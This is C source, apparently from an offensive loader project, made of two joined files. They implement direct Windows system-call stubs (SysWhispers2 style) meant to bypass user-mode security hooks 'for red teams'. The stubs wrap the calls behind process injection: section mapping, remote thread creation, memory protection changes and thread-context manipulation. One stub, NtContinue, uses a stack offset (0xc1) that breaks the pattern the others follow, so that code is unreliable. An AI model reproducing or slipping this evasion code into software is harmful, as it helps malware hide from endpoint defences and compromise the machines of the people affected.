158 IN ULONG SectionPageProtection,
159 IN ULONG AllocationAttributes,
160 IN HANDLE FileHandle OPTIONAL,
161 IN PSYSCALL_LIST SyscallList) {
162 __asm {
163 mov eax, dword ptr[esp + 0x20] // hex((1+(NUM_PARAMS-1))*4)
164 push eax
165 push 0x32956E27
166 call SW2_GetSyscallNumber
167 add esp, 8
168 call DoSysenter
169 ret
170 }
171 }
172
173 __declspec(naked) NTSTATUS NtMapViewOfSection(
174 IN HANDLE SectionHandle,
175 IN HANDLE ProcessHandle,
176 IN OUT PVOID BaseAddress,
177 IN ULONG ZeroBits,
178 IN SIZE_T CommitSize,
179 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
180 IN OUT PSIZE_T ViewSize,
181 IN ULONG InheritDisposition,
182 IN ULONG AllocationType,
183 IN ULONG Win32Protect,
184 IN PSYSCALL_LIST SyscallList) {
185 __asm {
186 mov eax, dword ptr[esp + 0x2c] // hex((1+(NUM_PARAMS-1))*4)
187 push eax
188 push 0x035E220D
189 call SW2_GetSyscallNumber
190 add esp, 8
191 call DoSysenter
192 ret
193 }
194 }
195
196 __declspec(naked) NTSTATUS NtUnmapViewOfSection(
197 IN HANDLE ProcessHandle,
198 IN PVOID BaseAddress,
199 IN PSYSCALL_LIST SyscallList) {
200 __asm {
201 mov eax, dword ptr[esp + 0x0c] // hex((1+(NUM_PARAMS-1))*4)
202 push eax
203 push 0x9ACEB842
204 call SW2_GetSyscallNumber
205 add esp, 8
206 call DoSysenter
207 ret
208 }
209 }
210
211 __declspec(naked) NTSTATUS NtContinue(
212 IN PCONTEXT ContextRecord,
213 IN BOOLEAN TestAlert,
214 IN PSYSCALL_LIST SyscallList) {
215 __asm {
216 mov eax, dword ptr[esp + 0xc1] // hex((1+(NUM_PARAMS-1))*4)
217 push eax
218 push 0xF2989153
219 call SW2_GetSyscallNumber
220 add esp, 8
221 call DoSysenter
222 ret
223 }
224 }
225
226 __declspec(naked) NTSTATUS NtClose(
227 IN HANDLE Handle,
228 IN PSYSCALL_LIST SyscallList) {
229 __asm {
230 mov eax, dword ptr[esp + 0x08] // hex((1+(NUM_PARAMS-1))*4)
231 push eax
232 push 0x349DD6D1
233 call SW2_GetSyscallNumber
234 add esp, 8
235 call DoSysenter
236 ret
237 }
238 }
239
240 __declspec(naked) NTSTATUS NtWaitForSingleObject(
241 IN HANDLE ObjectHandle,
242 IN BOOLEAN Alertable,
243 IN PLARGE_INTEGER TimeOut OPTIONAL,
244 IN PSYSCALL_LIST SyscallList) {
245 __asm {
246 mov eax, dword ptr[esp + 0x10] // hex((1+(NUM_PARAMS-1))*4)
247 push eax
248 push 0xE3BDE123
249 call SW2_GetSyscallNumber
250 add esp, 8
251 call DoSysenter
252 ret
253 }
254 }
255
256 __declspec(naked) NTSTATUS NtProtectVirtualMemory(
257 IN HANDLE ProcessHandle,
258 IN OUT PVOID * BaseAddress,
259 IN OUT PSIZE_T RegionSize,
260 IN ULONG NewProtect,
261 OUT PULONG OldProtect,
262 IN PSYSCALL_LIST SyscallList) {
263 __asm {
264 mov eax, dword ptr[esp + 0x18] // hex((1+(NUM_PARAMS-1))*4)
265 push eax
266 push 0x0B911517
267 call SW2_GetSyscallNumber
268 add esp, 8
269 call DoSysenter
270 ret
271 }
272 }
273
274 __declspec(naked) NTSTATUS NtGetContextThread(
275 IN HANDLE ThreadHandle,
276 IN OUT PCONTEXT ThreadContext,
277 IN PSYSCALL_LIST SyscallList) {
278 __asm {
279 mov eax, dword ptr[esp + 0x0c] // hex((1+(NUM_PARAMS-1))*4)
280 push eax
281 push 0x1CB74215
282 call SW2_GetSyscallNumber
283 add esp, 8
284 call DoSysenter
285 ret
286 }
287 }
288
289 __declspec(naked) NTSTATUS NtAllocateVirtualMemory(
290 IN HANDLE ProcessHandle,
291 IN OUT PVOID * BaseAddress,
292 IN ULONG ZeroBits,
293 IN OUT PSIZE_T RegionSize,
294 IN ULONG AllocationType,
295 IN ULONG Protect,
296 IN PSYSCALL_LIST SyscallList) {
297 __asm {
298 mov eax, dword ptr[esp + 0x1c] // hex((1+(NUM_PARAMS-1))*4)
299 push eax
300 push 0x31A5474B
301 call SW2_GetSyscallNumber
302 add esp, 8
303 call DoSysenter
304 ret
305 }
306 }
307
308 __declspec(naked) NTSTATUS NtFreeVirtualMemory(
309 IN HANDLE ProcessHandle,
310 IN OUT PVOID * BaseAddress,
311 IN OUT PSIZE_T RegionSize,
312 IN ULONG FreeType,
313 IN PSYSCALL_LIST SyscallList) {
314 __asm {
315 mov eax, dword ptr[esp + 0x14] // hex((1+(NUM_PARAMS-1))*4)
316 push eax
317 push 0x87907FEF
318 call SW2_GetSyscallNumber
319 add esp, 8
320 call DoSysenter
321 ret
322 }
323 }
324
325 __declspec(naked) NTSTATUS NtCreateFile(
326 OUT PHANDLE FileHandle,
327 IN ACCESS_MASK DesiredAccess,
328 IN POBJECT_ATTRIBUTES ObjectAttributes,
329 OUT PIO_STATUS_BLOCK IoStatusBlock,
330 IN PLARGE_INTEGER AllocationSize OPTIONAL,
331 IN ULONG FileAttributes,
332 IN ULONG ShareAccess,
333 IN ULONG CreateDisposition,
334 IN ULONG CreateOptions,
335 IN PVOID EaBuffer OPTIONAL,
336 IN ULONG EaLength,
337 IN PSYSCALL_LIST SyscallList) {
338 __asm {
339 mov eax, dword ptr[esp + 0x30] // hex((1+(NUM_PARAMS-1))*4)
340 push eax
341 push 0x249DFE2A
342 call SW2_GetSyscallNumber
343 add esp, 8
344 call DoSysenter
345 ret
346 }
347 }
348
349 __declspec(naked) NTSTATUS NtQueryVirtualMemory(
350 IN HANDLE ProcessHandle,
351 IN PVOID BaseAddress,
352 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
353 OUT PVOID MemoryInformation,
354 IN SIZE_T MemoryInformationLength,
355 OUT PSIZE_T ReturnLength OPTIONAL,
356 IN PSYSCALL_LIST SyscallList) {
357 __asm {
358 mov eax, dword ptr[esp + 0x1c] // hex((1+(NUM_PARAMS-1))*4)
359 push eax
360 push 0x55CF2B39
361 call SW2_GetSyscallNumber
362 add esp, 8
363 call DoSysenter
364 ret
365 }
366 }
367
368 __declspec(naked) NTSTATUS NtCreateThreadEx(
369 OUT PHANDLE ThreadHandle,
370 IN ACCESS_MASK DesiredAccess,
371 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
372 IN HANDLE ProcessHandle,
373 IN PVOID StartRoutine,
374 IN PVOID Argument OPTIONAL,
375 IN ULONG CreateFlags,
376 IN SIZE_T ZeroBits,
377 IN SIZE_T StackSize,
378 IN SIZE_T MaximumStackSize,
379 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
380 IN PSYSCALL_LIST SyscallList) {
381 __asm {
382 mov eax, dword ptr[esp + 0x30] // hex((1+(NUM_PARAMS-1))*4)
383 push eax
384 push 0x34297693
385 call SW2_GetSyscallNumber
386 add esp, 8
387 call DoSysenter
388 ret
389 }
390 }
391
392 __declspec(naked) NTSTATUS NtFlushInstructionCache(
393 IN HANDLE ProcessHandle,
394 IN PVOID BaseAddress OPTIONAL,
395 IN ULONG Length,
396 IN PSYSCALL_LIST SyscallList) {
397 __asm {
398 mov eax, dword ptr[esp + 0x10] // hex((1+(NUM_PARAMS-1))*4)
399 push eax
400 push 0xFFACC9F7
401 call SW2_GetSyscallNumber
402 add esp, 8
403 call DoSysenter
404 ret
405 }
406 }
407
408 #elif defined(__GNUC__)
409
410 __declspec(naked) NTSTATUS NtCreateSection(
411 OUT PHANDLE SectionHandle,
412 IN ACCESS_MASK DesiredAccess,
413 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
414 IN PLARGE_INTEGER MaximumSize OPTIONAL,
415 IN ULONG SectionPageProtection,
416 IN ULONG AllocationAttributes,
417 IN HANDLE FileHandle OPTIONAL,
418 IN PSYSCALL_LIST SyscallList) {
419 #if defined(_WIN64)
420 asm(
421 "push rcx\n"
422 "push rdx\n"
423 "push r8\n"
424 "push r9\n"
425 "mov ecx, 0x32956E27\n"
426 "mov rdx, qword ptr [rsp + 0x60]\n" // (4+5+(NUM_PARAMS-4-1))*8
427 "sub rsp, 0x28\n"
428 "call SW2_GetSyscallNumber\n"
429 "add rsp, 0x28\n"
430 "pop r9\n"
431 "pop r8\n"
432 "pop rdx\n"
433 "pop rcx\n"
434 "mov r10, rcx\n"
435 "syscall\n"
436 "ret\n"
437 );
438 #else
439 asm(
440 "mov eax, dword ptr[esp + 0x20]\n" // hex((1+(NUM_PARAMS-1))*4)
441 "push eax\n"
442 "push 0x32956E27\n"
443 "call SW2_GetSyscallNumber\n"
444 "add esp, 8\n"
445 "call DoSysenter\n"
446 "ret\n"
447 );
448 #endif
449 }
450
451 __declspec(naked) NTSTATUS NtMapViewOfSection(
452 IN HANDLE SectionHandle,
453 IN HANDLE ProcessHandle,
454 IN OUT PVOID BaseAddress,
455 IN ULONG ZeroBits,
456 IN SIZE_T CommitSize,
457 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
458 IN OUT PSIZE_T ViewSize,
459 IN ULONG InheritDisposition,
460 IN ULONG AllocationType,
461 IN ULONG Win32Protect,
462 IN PSYSCALL_LIST SyscallList) {
463 #if defined(_WIN64)
464 asm(
465 "push rcx\n"
466 "push rdx\n"
467 "push r8\n"
468 "push r9\n"
469 "mov ecx, 0x035E220D\n"
470 "mov rdx, qword ptr [rsp + 0x78]\n" // (4+5+(NUM_PARAMS-4-1))*8
471 "sub rsp, 0x28\n"
472 "call SW2_GetSyscallNumber\n"
473 "add rsp, 0x28\n"
474 "pop r9\n"
475 "pop r8\n"
476 "pop rdx\n"
477 "pop rcx\n"
478 "mov r10, rcx\n"
479 "syscall\n"
480 "ret\n"
481 );
482 #else
483 asm(
484 "mov eax, dword ptr[esp + 0x2c]\n" // hex((1+(NUM_PARAMS-1))*4)
485 "push eax\n"
486 "push 0x035E220D\n"
487 "call SW2_GetSyscallNumber\n"
488 "add esp, 8\n"
489 "call DoSysenter\n"
490 "ret\n"
491 );
492 #endif
493 }
494
495 __declspec(naked) NTSTATUS NtUnmapViewOfSection(
496 IN HANDLE ProcessHandle,
497 IN PVOID BaseAddress,
498 IN PSYSCALL_LIST SyscallList) {
499 #if defined(_WIN64)
500 asm(
501 "push rcx\n"
502 "push rdx\n"
503 "push r8\n"
504 "push r9\n"
505 "mov ecx, 0x9ACEB842\n"
506 "mov rdx, r8\n"
507 "sub rsp, 0x28\n"
508 "call SW2_GetSyscallNumber\n"
509 "add rsp, 0x28\n"
510 "pop r9\n"
511 "pop r8\n"
512 "pop rdx\n"
513 "pop rcx\n"
514 "mov r10, rcx\n"
515 "syscall\n"
516 "ret\n"
517 );
518 #else
519 asm(
520 "mov eax, dword ptr[esp + 0x0c]\n" // hex((1+(NUM_PARAMS-1))*4)
521 "push eax\n"
522 "push 0x9ACEB842\n"
523 "call SW2_GetSyscallNumber\n"
524 "add esp, 8\n"
525 "call DoSysenter\n"
526 "ret\n"
527 );
528 #endif
529 }
530
531 __declspec(naked) NTSTATUS NtContinue(
532 IN PCONTEXT ContextRecord,
533 IN BOOLEAN TestAlert,
534 IN PSYSCALL_LIST SyscallList) {
535 #if defined(_WIN64)
536 asm(
537 "push rcx\n"
538 "push rdx\n"
539 "push r8\n"
540 "push r9\n"
541 "mov ecx, 0xF2989153\n"
542 "mov rdx, r8\n"
543 "sub rsp, 0x28\n"
544 "call SW2_GetSyscallNumber\n"
545 "add rsp, 0x28\n"
546 "pop r9\n"
547 "pop r8\n"
548 "pop rdx\n"
549 "pop rcx\n"
550 "mov r10, rcx\n"
551 "syscall\n"
552 "ret\n"
553 );
554 #else
555 asm(
556 "mov eax, dword ptr[esp + 0xc1]\n" // hex((1+(NUM_PARAMS-1))*4)
557 "push eax\n"
558 "push 0xF2989153\n"
559 "call SW2_GetSyscallNumber\n"
560 "add esp, 8\n"
561 "call DoSysenter\n"
562 "ret\n"
563 );
564 #endif
565 }
566
567 __declspec(naked) NTSTATUS NtClose(
568 IN HANDLE Handle,
569 IN PSYSCALL_LIST SyscallList) {
570 #if defined(_WIN64)
571 asm(
572 "push rcx\n"
573 "push rdx\n"
574 "push r8\n"
575 "push r9\n"
576 "mov ecx, 0x349DD6D1\n"
577 "mov rdx, rdx\n"
578 "sub rsp, 0x28\n"
579 "call SW2_GetSyscallNumber\n"
580 "add rsp, 0x28\n"
581 "pop r9\n"
582 "pop r8\n"
583 "pop rdx\n"
584 "pop rcx\n"
585 "mov r10, rcx\n"
586 "syscall\n"
587 "ret\n"
588 );
589 #else
590 asm(
591 "mov eax, dword ptr[esp + 0x08]\n" // hex((1+(NUM_PARAMS-1))*4)
592 "push eax\n"
593 "push 0x349DD6D1\n"
594 "call SW2_GetSyscallNumber\n"
595 "add esp, 8\n"
596 "call DoSysenter\n"
597 "ret\n"
598 );
599 #endif
600 }
601
602 __declspec(naked) NTSTATUS NtWaitForSingleObject(
603 IN HANDLE ObjectHandle,
604 IN BOOLEAN Alertable,
605 IN PLARGE_INTEGER TimeOut OPTIONAL,
606 IN PSYSCALL_LIST SyscallList) {
607 #if defined(_WIN64)
608 asm(
609 "push rcx\n"
610 "push rdx\n"
611 "push r8\n"
612 "push r9\n"
613 "mov ecx, 0xE3BDE123\n"
614 "mov rdx, r9\n"
615 "sub rsp, 0x28\n"
616 "call SW2_GetSyscallNumber\n"
617 "add rsp, 0x28\n"
618 "pop r9\n"
619 "pop r8\n"
620 "pop rdx\n"
621 "pop rcx\n"
622 "mov r10, rcx\n"
623 "syscall\n"
624 "ret\n"
625 );
626 #else
627 asm(
628 "mov eax, dword ptr[esp + 0x10]\n" // hex((1+(NUM_PARAMS-1))*4)
629 "push eax\n"
630 "push 0xE3BDE123\n"
631 "call SW2_GetSyscallNumber\n"
632 "add esp, 8\n"
633 "call DoSysenter\n"
634 "ret\n"
635 );
636 #endif
637 }
638
639 __declspec(naked) NTSTATUS NtProtectVirtualMemory(
640 IN HANDLE ProcessHandle,
641 IN OUT PVOID * BaseAddress,
642 IN OUT PSIZE_T RegionSize,
643 IN ULONG NewProtect,
644 OUT PULONG OldProtect,
645 IN PSYSCALL_LIST SyscallList) {
646 #if defined(_WIN64)
647 asm(
648 "push rcx\n"
649 "push rdx\n"
650 "push r8\n"
651 "push r9\n"
652 "mov ecx, 0x0B911517\n"
653 "mov rdx, qword ptr [rsp + 0x50]\n" // (4+5+(NUM_PARAMS-4-1))*8
654 "sub rsp, 0x28\n"
655 "call SW2_GetSyscallNumber\n"
656 "add rsp, 0x28\n"
657 "pop r9\n"
658 "pop r8\n"
659 "pop rdx\n"
660 "pop rcx\n"
661 "mov r10, rcx\n"
662 "syscall\n"
663 "ret\n"
664 );
665 #else
666 asm(
667 "mov eax, dword ptr[esp + 0x18]\n" // hex((1+(NUM_PARAMS-1))*4)
668 "push eax\n"
669 "push 0x0B911517\n"
670 "call SW2_GetSyscallNumber\n"
671 "add esp, 8\n"
672 "call DoSysenter\n"
673 "ret\n"
674 );
675 #endif
676 }
677
678 __declspec(naked) NTSTATUS NtGetContextThread(
679 IN HANDLE ThreadHandle,
680 IN OUT PCONTEXT ThreadContext,
681 IN PSYSCALL_LIST SyscallList) {
682 #if defined(_WIN64)
683 asm(
684 "push rcx\n"
685 "push rdx\n"
686 "push r8\n"
687 "push r9\n"
688 "mov ecx, 0x1CB74215\n"
689 "mov rdx, r8\n"
690 "sub rsp, 0x28\n"
691 "call SW2_GetSyscallNumber\n"
692 "add rsp, 0x28\n"
693 "pop r9\n"
694 "pop r8\n"
695 "pop rdx\n"
696 "pop rcx\n"
697 "mov r10, rcx\n"
698 "syscall\n"
699 "ret\n"
700 );
701 #else
702 asm(
703 "mov eax, dword ptr[esp + 0x0c]\n" // hex((1+(NUM_PARAMS-1))*4)
704 "push eax\n"
705 "push 0x1CB74215\n"
706 "call SW2_GetSyscallNumber\n"
707 "add esp, 8\n"
708 "call DoSysenter\n"
709 "ret\n"
710 );
711 #endif
712 }
713
714 __declspec(naked) NTSTATUS NtAllocateVirtualMemory(
715 IN HANDLE ProcessHandle,
716 IN OUT PVOID * BaseAddress,
717 IN ULONG ZeroBits,
718 IN OUT PSIZE_T RegionSize,
719 IN ULONG AllocationType,
720 IN ULONG Protect,
721 IN PSYSCALL_LIST SyscallList) {
722 #if defined(_WIN64)
723 asm(
724 "push rcx\n"
725 "push rdx\n"
726 "push r8\n"
727 "push r9\n"
728 "mov ecx, 0x31A5474B\n"
729 "mov rdx, qword ptr [rsp + 0x58]\n" // (4+5+(NUM_PARAMS-4-1))*8
730 "sub rsp, 0x28\n"
731 "call SW2_GetSyscallNumber\n"
732 "add rsp, 0x28\n"
733 "pop r9\n"
734 "pop r8\n"
735 "pop rdx\n"
736 "pop rcx\n"
737 "mov r10, rcx\n"
738 "syscall\n"
739 "ret\n"
740 );
741 #else
742 asm(
743 "mov eax, dword ptr[esp + 0x1c]\n" // hex((1+(NUM_PARAMS-1))*4)
744 "push eax\n"
745 "push 0x31A5474B\n"
746 "call SW2_GetSyscallNumber\n"
747 "add esp, 8\n"
748 "call DoSysenter\n"
749 "ret\n"
750 );
751 #endif
752 }
753
754 __declspec(naked) NTSTATUS NtFreeVirtualMemory(
755 IN HANDLE ProcessHandle,
756 IN OUT PVOID * BaseAddress,
757 IN OUT PSIZE_T RegionSize,
758 IN ULONG FreeType,
759 IN PSYSCALL_LIST SyscallList) {
760 #if defined(_WIN64)
761 asm(
762 "push rcx\n"
763 "push rdx\n"
764 "push r8\n"
765 "push r9\n"
766 "mov ecx, 0x87907FEF\n"
767 "mov rdx, qword ptr [rsp + 0x48]\n" // (4+5+(NUM_PARAMS-4-1))*8
768 "sub rsp, 0x28\n"
769 "call SW2_GetSyscallNumber\n"
770 "add rsp, 0x28\n"
771 "pop r9\n"
772 "pop r8\n"
773 "pop rdx\n"
774 "pop rcx\n"
775 "mov r10, rcx\n"
776 "syscall\n"
777 "ret\n"
778 );
779 #else
780 asm(
781 "mov eax, dword ptr[esp + 0x14]\n" // hex((1+(NUM_PARAMS-1))*4)
782 "push eax\n"
783 "push 0x87907FEF\n"
784 "call SW2_GetSyscallNumber\n"
785 "add esp, 8\n"
786 "call DoSysenter\n"
787 "ret\n"
788 );
789 #endif
790 }
791
792 __declspec(naked) NTSTATUS NtCreateFile(
793 OUT PHANDLE FileHandle,
794 IN ACCESS_MASK DesiredAccess,
795 IN POBJECT_ATTRIBUTES ObjectAttributes,
796 OUT PIO_STATUS_BLOCK IoStatusBlock,
797 IN PLARGE_INTEGER AllocationSize OPTIONAL,
798 IN ULONG FileAttributes,
799 IN ULONG ShareAccess,
800 IN ULONG CreateDisposition,
801 IN ULONG CreateOptions,
802 IN PVOID EaBuffer OPTIONAL,
803 IN ULONG EaLength,
804 IN PSYSCALL_LIST SyscallList) {
805 #if defined(_WIN64)
806 asm(
807 "push rcx\n"
808 "push rdx\n"
809 "push r8\n"
810 "push r9\n"
811 "mov ecx, 0x249DFE2A\n"
812 "mov rdx, qword ptr [rsp + 0x80]\n" // (4+5+(NUM_PARAMS-4-1))*8
813 "sub rsp, 0x28\n"
814 "call SW2_GetSyscallNumber\n"
815 "add rsp, 0x28\n"
816 "pop r9\n"
817 "pop r8\n"
818 "pop rdx\n"
819 "pop rcx\n"
820 "mov r10, rcx\n"
821 "syscall\n"
822 "ret\n"
823 );
824 #else
825 asm(
826 "mov eax, dword ptr[esp + 0x30]\n" // hex((1+(NUM_PARAMS-1))*4)
827 "push eax\n"
828 "push 0x249DFE2A\n"
829 "call SW2_GetSyscallNumber\n"
830 "add esp, 8\n"
831 "call DoSysenter\n"
832 "ret\n"
833 );
834 #endif
835 }
836
837 __declspec(naked) NTSTATUS NtQueryVirtualMemory(
838 IN HANDLE ProcessHandle,
839 IN PVOID BaseAddress,
840 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
841 OUT PVOID MemoryInformation,
842 IN SIZE_T MemoryInformationLength,
843 OUT PSIZE_T ReturnLength OPTIONAL,
844 IN PSYSCALL_LIST SyscallList) {
845 #if defined(_WIN64)
846 asm(
847 "push rcx\n"
848 "push rdx\n"
849 "push r8\n"
850 "push r9\n"
851 "mov ecx, 0x55CF2B39\n"
852 "mov rdx, qword ptr [rsp + 0x58]\n" // (4+5+(NUM_PARAMS-4-1))*8
853 "sub rsp, 0x28\n"
854 "call SW2_GetSyscallNumber\n"
855 "add rsp, 0x28\n"
856 "pop r9\n"
857 "pop r8\n"
858 "pop rdx\n"
859 "pop rcx\n"
860 "mov r10, rcx\n"
861 "syscall\n"
862 "ret\n"
863 );
864 #else
865 asm(
866 "mov eax, dword ptr[esp + 0x1c]\n" // hex((1+(NUM_PARAMS-1))*4)
867 "push eax\n"
868 "push 0x55CF2B39\n"
869 "call SW2_GetSyscallNumber\n"
870 "add esp, 8\n"
871 "call DoSysenter\n"
872 "ret\n"
873 );
874 #endif
875 }
876
877 __declspec(naked) NTSTATUS NtCreateThreadEx(
878 OUT PHANDLE ThreadHandle,
879 IN ACCESS_MASK DesiredAccess,
880 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
881 IN HANDLE ProcessHandle,
882 IN PVOID StartRoutine,
883 IN PVOID Argument OPTIONAL,
884 IN ULONG CreateFlags,
885 IN SIZE_T ZeroBits,
886 IN SIZE_T StackSize,
887 IN SIZE_T MaximumStackSize,
888 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
889 IN PSYSCALL_LIST SyscallList) {
890 #if defined(_WIN64)
891 asm(
892 "push rcx\n"
893 "push rdx\n"
894 "push r8\n"
895 "push r9\n"
896 "mov ecx, 0x34297693\n"
897 "mov rdx, qword ptr [rsp + 0x80]\n" // (4+5+(NUM_PARAMS-4-1))*8
898 "sub rsp, 0x28\n"
899 "call SW2_GetSyscallNumber\n"
900 "add rsp, 0x28\n"
901 "pop r9\n"
902 "pop r8\n"
903 "pop rdx\n"
904 "pop rcx\n"
905 "mov r10, rcx\n"
906 "syscall\n"
907 "ret\n"
908 );
909 #else
910 asm(
911 "mov eax, dword ptr[esp + 0x30]\n" // hex((1+(NUM_PARAMS-1))*4)
912 "push eax\n"
913 "push 0x34297693\n"
914 "call SW2_GetSyscallNumber\n"
915 "add esp, 8\n"
916 "call DoSysenter\n"
917 "ret\n"
918 );
919 #endif
920 }
921
922 __declspec(naked) NTSTATUS NtFlushInstructionCache(
923 IN HANDLE ProcessHandle,
924 IN PVOID BaseAddress OPTIONAL,
925 IN ULONG Length,
926 IN PSYSCALL_LIST SyscallList) {
927 #if defined(_WIN64)
928 asm(
929 "push rcx\n"
930 "push rdx\n"
931 "push r8\n"
932 "push r9\n"
933 "mov ecx, 0xFFACC9F7\n"
934 "mov rdx, r9\n"
935 "sub rsp, 0x28\n"
936 "call SW2_GetSyscallNumber\n"
937 "add rsp, 0x28\n"
938 "pop r9\n"
939 "pop r8\n"
940 "pop rdx\n"
941 "pop rcx\n"
942 "mov r10, rcx\n"
943 "syscall\n"
944 "ret\n"
945 );
946 #else
947 asm(
948 "mov eax, dword ptr[esp + 0x10]\n" // hex((1+(NUM_PARAMS-1))*4)
949 "push eax\n"
950 "push 0xFFACC9F7\n"
951 "call SW2_GetSyscallNumber\n"
952 "add esp, 8\n"
953 "call DoSysenter\n"
954 "ret\n"
955 );
956 #endif
957 }
958
959 #endif
960
961 #if defined(_M_IX86)
962 __declspec(naked) VOID DoSysenter(VOID) {
963 #if defined(_MSC_VER)
964 __asm {
965 mov edx, esp
966 int 0x2e
967 ret
968 };
969 #elif defined(__GNUC__)
970 asm(
971 "mov edx, esp\n"
972 "sysenter\n"
973 "ret\n"
974 );
975 #endif
976 }
977 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #pragma once
32
33 // Code below is adapted from @modexpblog. Read linked article for more details.
34 // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
35
36 #ifndef SW2_HEADER_H_
37 #define SW2_HEADER_H_
38
39 #include <windows.h>
40 #include "peb.h"
41
42 #define SW2_SEED 0x26C20505
43 #define SW2_ROL8(v) (v << 8 | v >> 24)
44 #define SW2_ROR8(v) (v >> 8 | v << 24)
45 #define SW2_ROX8(v) ((SW2_SEED % 2) ? SW2_ROL8(v) : SW2_ROR8(v))
46 #define SW2_MAX_ENTRIES 500
47 #define SW2_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)
48
49 #ifdef _WIN64
50 #define PEB_OFFSET 0x60
51 #define READ_MEMLOC __readgsqword
52 #else
53 #define PEB_OFFSET 0x30
54 #define READ_MEMLOC __readfsdword
55 #endif
56
57 // Typedefs are prefixed to avoid pollution.
58
59 typedef struct _SW2_SYSCALL_ENTRY
60 {
61 DWORD Hash;
62 DWORD Address;
63 } SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;
64
65 typedef struct _SW2_SYSCALL_LIST
66 {
67 DWORD Count;
68 SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
69 } SYSCALL_LIST, *PSYSCALL_LIST;
70
71 typedef struct _SW2_PEB_LDR_DATA {
72 BYTE Reserved1[8];
73 PVOID Reserved2[3];
74 LIST_ENTRY InMemoryOrderModuleList;
75 } SW2_PEB_LDR_DATA, *PSW2_PEB_LDR_DATA;
76
77 typedef struct _SW2_LDR_DATA_TABLE_ENTRY {
78 PVOID Reserved1[2];
79 LIST_ENTRY InMemoryOrderLinks;
80 PVOID Reserved2[2];
81 PVOID DllBase;
82 } SW2_LDR_DATA_TABLE_ENTRY, *PSW2_LDR_DATA_TABLE_ENTRY;
83
84 typedef struct _SW2_PEB {
85 BYTE Reserved1[2];
86 BYTE BeingDebugged;
87 BYTE Reserved2[1];
88 PVOID Reserved3[2];
89 PSW2_PEB_LDR_DATA Ldr;
90 } SW2_PEB, *PSW2_PEB;
91
92 DWORD SW2_HashSyscall(PCSTR FunctionName);
93 BOOL SW2_PopulateSyscallList(PSYSCALL_LIST SW2_SyscallList);
94 #if defined(__GNUC__)
95 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SW2_SyscallList) asm ("SW2_GetSyscallNumber");
96 #if defined(_M_IX86)
97 VOID DoSysenter(VOID) asm ("DoSysenter");
98 #endif
99 #else
100 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SW2_SyscallList);
101 #if defined(_M_IX86)
102 VOID DoSysenter(VOID);
103 #endif
104 #endif
105
106 #define OBJ_CASE_INSENSITIVE 0x00000040L
107
108 #ifndef InitializeObjectAttributes
109 #define InitializeObjectAttributes( p, n, a, r, s ) { \
110 (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
111 (p)->RootDirectory = r; \
112 (p)->Attributes = a; \
113 (p)->ObjectName = n; \
114 (p)->SecurityDescriptor = s; \
115 (p)->SecurityQualityOfService = NULL; \
116 }
117 #endif
118
119 typedef struct _OBJECT_ATTRIBUTES
120 {
121 ULONG Length;
122 HANDLE RootDirectory;
123 PUNICODE_STRING ObjectName;
124 ULONG Attributes;
125 PVOID SecurityDescriptor;
126 PVOID SecurityQualityOfService;
127 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
128
129 typedef struct _IO_STATUS_BLOCK
130 {
131 union
132 {
133 NTSTATUS Status;
134 VOID* Pointer;
135 };
136 ULONG_PTR Information;
137 } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
138
139 typedef struct _USER_STACK
140 {
141 PVOID FixedStackBase;
142 PVOID FixedStackLimit;
143 PVOID ExpandableStackBase;
144 PVOID ExpandableStackLimit;
145 PVOID ExpandableStackBottom;
146 } USER_STACK, *PUSER_STACK;
147
148 typedef enum _MEMORY_INFORMATION_CLASS
149 {
150 MemoryBasicInformation,
151 MemoryWorkingSetInformation,
152 MemoryMappedFilenameInformation,
153 MemoryRegionInformation,
154 MemoryWorkingSetExInformation,
155 MemorySharedCommitInformation,
156 MemoryImageInformation,
157 MemoryRegionInformationEx,
158 MemoryPrivilegedBasicInformation,
159 MemoryEnclaveImageInformation,
160 MemoryBasicInformationCapped
